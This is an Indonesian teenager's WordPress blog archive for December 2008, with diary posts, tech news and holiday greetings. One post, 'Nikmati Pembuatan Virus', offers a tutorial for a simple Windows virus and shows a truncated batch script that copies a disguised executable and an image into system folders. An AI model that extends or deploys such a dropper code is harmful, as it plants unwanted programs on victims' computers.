4ditya92's Weblog

Just another WordPress.com weblog

  • December 2008
    M T W T F S S
    1234567
    891011121314
    15161718192021
    22232425262728
    293031  
  • Archives

  • Pages

  • Categories

  • Klik tertinggi

    • None
  • Top Rated

  • Blog Stats

    • 158,889 hits
  • Sponsor

    Adsense Indonesia
  • Blogvertise
  • Masukkan alamat surel Anda untuk berlangganan blog ini dan menerima pemberitahuan tulisan-tulisan baru melalui surel.

    Join 5 other followers

Archive for December, 2008

Blogger Madiun Cari Pacar

Posted by 4ditya92 on 31/12/2008

Hari ini, telah kita lalui. waduh enaknya saya posting lewat laptopnya mas bayu karena speedynya sudah habis waktunya, huh mau apa lagi sekarang. Oh…. ya tadi anak-anak blogger madiun pada kumpul dan jalan-jalan ke alun-alun diantaranya yang senior (mas bayu, mas iwan, mas anton), dan yang junior diantaranya(saya, arie, bakti). Waduh, betapa enaknya. Di alun-alun madiun, dan blogger madiun ikut menyemarakan pergantian tahun baru 2009. Dan disana kita-kita juga disana sambil memanfaatkan, untuk cari pacar baru. Dimana, saat ini para blogger madiun masih jomblo. Dan barang sipapun yang mau daftar silahkan kunjungi blog masing-masing dari blogger madiun yang jomblo terutama ya.

Tetapi ini artikelnya cukup singkat intinya disini cuma mau cari pacar gitu

Posted in Banyolan, Cinta | Tagged: , , | 13 Comments »

PR Tahun Baru 2009

Posted by 4ditya92 on 31/12/2008

PR menjelang Tahun Baru 2009 akhirnya tiba juga, waduh sebenarnya apayang dimaksud pR ini saya pun tidak tahu. Saya nulis ini juga ikut-ikutan, senior saya (Mas bayu, mas Iwan, Mas anton, dll). Entah kenaa saya jadi ikut-ikutan ini waduh bingung lagi.

* Mengapa Blog Kamu bernama…???
* Mengapa Blog kamu memakai Template ini???
* Kejadian apa yang tak terlupakan dalam hidupmu???
* Kirim PR ini ke-10 sahabat Blogger!

Read the rest of this entry »

Posted in Banyolan, Berita, Informasi, Liburan, Remaja | Tagged: , , , | 1 Comment »

WiMAX vs LTE

Posted by 4ditya92 on 31/12/2008

Dua teknologi nirkabel yang baru naik daun ini tampak bersaing. WiMAX (Worldwide Interoperability for Microwave Access) lebih dulu lahir daripada LTE (Long Term Evolution). Secara perangkat dan dukungan vendor handset WiMAX lebih siap dibandingkan LTE pada tahun 2009. Sedangkan LTE akan berkembang setelah tahun 2010. Masing-masing teknologi ini oleh International Telecommunications Union (ITU) akan dijadikan kandidat standar jaringan 4G (at least 100 Mbps untuk transfer data) paling tidak pada tahun 2009. Read the rest of this entry »

Posted in Global, Informasi, Teknologi | Tagged: , , | Leave a Comment »

Indonesia => Produsen Biodisel

Posted by 4ditya92 on 30/12/2008

Ternyata, Indonesia akan menjadi produsen biodiesel utama di dunia. Karena, produksi biodiesel Indonesia akan meningkat tajam. Menteri Energi dan Sumber Daya Mineral Purnomo Yusgiantoro mengatakan, saat ini produksi biodiesel di Tanah Air sebesar 2 juta kl per tahun. Menurut dia, dengan volume produksi sebesar itu, Indonesia akan memimpin menjadi produsen biodiesel di dunia.
Read the rest of this entry »

Posted in Artikel, Berita, Global, Informasi, Teknologi | Tagged: , , | 2 Comments »

Nikmati Pembuatan Virus

Posted by 4ditya92 on 28/12/2008

Nih tak kasih pencerahan untuk buat virus sederhana. Tapi sebelumnya kalau ada kesalahan tulis isi sendiriya

@echo off
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\system32\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\ /y

Read the rest of this entry »

Posted in Berita, Informasi, Tips & Trick | Tagged: , | 7 Comments »

Hari libur berlalu

Posted by 4ditya92 on 28/12/2008

Waduh, sudah empat hari tak terasa hari libur sudah berlalu. Dimana kegitan-kegiatan ku selalu begini-begini terus yah kadang ngebloglah kadang tidurlah, berbeda dengan temen temen yang lain selalu bisa happy-happy. Sebaiknya sakerjakan deh Kegiatan-kegiatan positif. Apalagi, sudah mau kembali ke sekolah. Duh, sekarang saya kurang solusi dimana saat ini saya hanya dapat menghadap komputer dan nulis apa yang ada di isi hatiku (wis mboh opo sing tak tulis iki). Oh ya ini kisah, hari-hari yang lalu. Read the rest of this entry »

Posted in Liburan, Remaja | Tagged: , , | 2 Comments »

“Selamat Natal 2008 dan Tahun Baru 2009”

Posted by 4ditya92 on 27/12/2008

Semoga terang Natal akan tinggal di Hati kita dan menjadi terang
bagi kita semua dan semoga tahun yang baru memberi kita
harapan kehidupan yang lebih baik.

Posted in Uncategorized | Tagged: | 2 Comments »

Holiday 2008

Posted by 4ditya92 on 24/12/2008

 

holiday08_11

Akhirnya hari libur pun datang juga, Ini yang kutunggu-tunggu. Dimana event-event terpenting akan dimulai seperti saat ini. Waktu ini saya lagi mute, ya jadi lebih bai nulis apa adanya aja, dari pada main game. Tapi menurutku ngeblog merupakan sebuah permainan juga yang dimana saat ini, para blogger diminta untuk mencari visitor sebanyak mungkin. Read the rest of this entry »

Posted in Liburan, Remaja, Sekolah | Tagged: , , , , | 6 Comments »

Intel Core i7 & Motherboard ASUS ROG Rampage II Extreme

Posted by 4ditya92 on 24/12/2008

Peluncuran prosesor Intel Core i7 telah membuat arena overclocking berlomba-lomba untuk mencetak rekor dunia baru. Motherboard ASUS ROG Rampage II Extreme yang mendukung platform Intel terbaru ini, seorang overclocking asal Jepang, duck, telah menembus papan atas overclocking dan mencetak rekor dunia baru bagi frekuensi CPU Core i7. Dia berhasil mencetak nilai 5510.09 MHz, sebuah skor yang sangat menantang bagi para overclocker lainnya untuk melampaui skor ini. Veteran overclocking CPU ini pun masih menyandang skor tertinggi di dunia untuk frekuensi CPU Pentium 4 631 dengan skor yang menakjubkan tahun lalu, yakni 8180.4MHz.

Read the rest of this entry »

Posted in Artikel, Berita, Global, Informasi, Teknologi | Leave a Comment »

Liburan tanpa pacar itu sulit

Posted by 4ditya92 on 23/12/2008

 

Sekarang saya dirumah, menghadap komputer dan nulis deh. 

Pertama , tulisan ini yang baca harus mengerti arti cinta terutama jiwanya dewasa karena harus                          siap berkomentar.

Kedua ,     mengerti cara mengikat wanita yang paling sukses

Ketiga ,      Saya nggak tahu mau nulis apa?

Pada saat ini, saya nggak ada ide nggak tahu kenapa kok tiba tiba saya nulis ini. Padaha saya kadang takut di kamar sendirian karena iman saya lemah, dan saya sedang dengarkan radio. O.K

Oya tadi mau ngungkit masalah liburan tanpa pacar itu sulit. Memang ini dialami beberapa remaja apalagi ini seberntar lagi malam tahun baru tanpa pacar apa gunanya liburan tahun baru ini. Read the rest of this entry »

Posted in Artikel, Banyolan, Cinta, Global, Remaja | Tagged: , , | Leave a Comment »

 
%d bloggers like this: